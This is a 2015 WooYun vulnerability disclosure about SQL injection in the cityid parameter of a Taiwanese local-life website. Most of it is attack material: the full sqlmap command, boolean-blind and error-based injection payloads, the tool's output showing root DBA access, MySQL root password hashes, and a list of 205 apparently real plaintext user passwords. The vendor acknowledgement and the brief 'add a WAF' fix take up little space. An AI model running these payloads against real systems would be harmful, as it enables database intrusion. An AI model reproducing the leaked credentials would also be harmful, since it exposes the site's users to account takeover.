当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155825

漏洞标题:屏東生活主站存在SQL植入漏洞(DBA權限|root密碼泄露|大量用戶明文密碼泄露)(臺灣地區)

相关厂商:屏東生活

漏洞作者: 路人甲

提交时间:2015-11-25 15:44

修复时间:2016-01-05 19:03

公开时间:2016-01-05 19:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

屏東生活主站存在SQL植入漏洞(DBA權限|root密碼泄露|大量用戶明文密碼泄露)

详细说明:

地址:http://**.**.**.**/foods/index.php?cityid=5

$ python sqlmap.py -u "http://**.**.**.**/foods/index.php?cityid=5" -p cityid --technique=BE --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


漏洞证明:

---
Parameter: cityid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cityid=5 AND 8239=8239
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cityid=5 AND (SELECT 7499 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(7499=7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [4]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
database management system users password hashes:
[*] root [2]:
    password hash: 5b57dbc612de8c44
    password hash: NULL
Database: ptnet
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ad3                                   | 103266  |
| main                                  | 43597   |
| service                               | 10148   |
| blog                                  | 1171    |
| country                               | 365     |
| submain                               | 296     |
| `user`                                | 205     |
| title                                 | 151     |
| talk                                  | 115     |
| city                                  | 25      |
| ad2                                   | 21      |
| showgoods                             | 20      |
| mapdata                               | 16      |
| showclass1                            | 14      |
| ad                                    | 13      |
| class                                 | 12      |
| showclass                             | 10      |
| talkclass                             | 4       |
| admin                                 | 1       |
| pic                                   | 1       |
| showshop                              | 1       |
+---------------------------------------+---------+
Database: webinfo
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| main                                  | 10912   |
| `pad`                                 | 4144    |
| ad3                                   | 858     |
| city                                  | 20      |
| ad2                                   | 19      |
| service                               | 16      |
| ad                                    | 13      |
| admin                                 | 1       |
| class                                 | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 553     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| STATISTICS                            | 79      |
| KEY_COLUMN_USAGE                      | 76      |
| TABLES                                | 67      |
| TABLE_CONSTRAINTS                     | 56      |
| USER_PRIVILEGES                       | 52      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 28      |
| SCHEMATA                              | 5       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| `user`                                | 4       |
| db                                    | 2       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ptnet
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ptnet
Table: user
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: webinfo
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: ptnet
Table: admin
[1 entry]
+----------+
| password |
+----------+
| admin    |
+----------+
Database: ptnet
Table: user
[205 entries]
+--------------+
| password     |
+--------------+
| 03150315     |
| 0516         |
| 12010214     |
| 122550       |
| 123456       |
| 123xD        |
| 1Qvrwx       |
| 1hwMD        |
| 1jVt3j       |
| 1vp6rD       |
| 224466abc    |
| 28825252     |
| 28825252     |
| 28825252     |
| 2cF3X        |
| 2sCNzo       |
| 38897687     |
| 3IliJ        |
| 3ilRu        |
| 3ygyZ        |
| 4DQwOMkN     |
| 4dN4wY       |
| 5601         |
| 5fxoTf       |
| 60044287     |
| 60OqRV       |
| 632178       |
| 649626       |
| 6BhWD        |
| 701017       |
| 7800690      |
| 78910        |
| 7wxvZh       |
| 891021       |
| 8KT87m       |
| 8T5Pch       |
| 9543b        |
| 9KalF8       |
| 9Qr6l        |
| 9ZKzH        |
| A8IiD7I9     |
| AFFZO7811    |
| ARnxx        |
| B3NHa        |
| BizJAQ       |
| D1AM53       |
| DyFuH        |
| E4waO        |
| EuwfgA       |
| ExNNK        |
| FAI9x        |
| FvArcs       |
| GakHZV       |
| GnDWc        |
| IbilBl       |
| JBuF5        |
| JoB7c        |
| Kq46R        |
| LyuqMn       |
| M8CGT        |
| ME7aw        |
| NO9wgj       |
| NsTdqBWo     |
| O4IeE        |
| O5b4UL       |
| OJIvg        |
| P25dHR       |
| PjlkH        |
| Ps6oI        |
| PtCsv        |
| QTUD45       |
| QarfjW       |
| Qw2DN        |
| RWVdk        |
| Rupbw        |
| SPcsQ        |
| SUFFER       |
| Sv0nyA       |
| SzqFY        |
| U3ASRr       |
| UanCPm       |
| UfoNp        |
| V28MVm       |
| VWBka        |
| W0DmFD       |
| WZuohy       |
| WdnKxp       |
| WrzP8        |
| XEPZogDI     |
| XPefVU       |
| XegaSd       |
| Y1joG        |
| ZNMfA7       |
| a123456      |
| aa7896616    |
| admin168     |
| an4b2p       |
| anOP59gk     |
| bHdCe        |
| bepK3x       |
| bpUDGM       |
| cGFdP        |
| cMxpZK       |
| cODBGM       |
| ck672516     |
| coa628816    |
| coffee       |
| cy7eMf       |
| dwc0Vk       |
| e1QeS        |
| eItVk        |
| egFLmO       |
| eric11688    |
| ewxoB        |
| fFQkE        |
| fUFzY        |
| ffzrK        |
| fjj4Rv       |
| fxJOc        |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| g00dPa$$w0rD |
| gA1E7GOf     |
| gD6bZX       |
| gSymXc       |
| gbzj7i       |
| gcqRo        |
| gianA        |
| gofQsj       |
| hMD20        |
| iA7Bf        |
| ii87034      |
| imsZd        |
| j3jeHQ       |
| jCCUD        |
| jH695G       |
| jIkFU        |
| jO1yj        |
| juses        |
| kWdfJE       |
| kf4SoE       |
| khJNZV       |
| kyu0S        |
| l2PO3o       |
| l6sc1l       |
| lDV3T        |
| lh9y3        |
| mE3pH        |
| mQvgO        |
| mo07141009   |
| mxDn9T       |
| n131419      |
| nGlJ6        |
| nYIzN        |
| noqqIx       |
| nxO8ZM       |
| oO2ESP       |
| ol55Y        |
| pHn2d        |
| pt11688      |
| pt369723     |
| ptlife168    |
| qGPqwR       |
| qZFjSa       |
| qm7cYp       |
| rGBdp        |
| rSwtIT       |
| rbLXJj       |
| sFgN5O       |
| sd123456     |
| t0937112439  |
| tJQRkk       |
| tRpxST       |
| tgdc3371map  |
| tmNGYS       |
| ts99772041   |
| uFmwM        |
| user         |
| vuYH6        |
| wqowT0       |
| x35QU9       |
| xV2zL        |
| y1981700513  |
| y1981700513  |
| yZeATb       |
| ysXPOb       |
| z0WqKK       |
| z8pkxr       |
| z9hgp        |
| zBg6yX       |
+--------------+
Database: webinfo
Table: admin
[1 entry]
+----------+
| password |
+----------+
| admin    |
+----------+
Database: mysql
Table: user
[4 entries]
+------------------+
| Password         |
+------------------+
| 5b57dbc612de8c44 |
| 5b57dbc612de8c44 |
|
|
+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cityid=5 AND 8239=8239
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cityid=5 AND (SELECT 7499 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(7499=7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: ptnet
Table: ad3
[10 columns]
+------------+
| Column     |
+------------+
| adclass    |
| adid       |
| adname     |
| adtime     |
| classid    |
| pic        |
| pid        |
| state      |
| subclassid |
| url        |
+------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-11-27 23:14

厂商回复:

感謝通報

最新状态:

2016-01-05:確認修復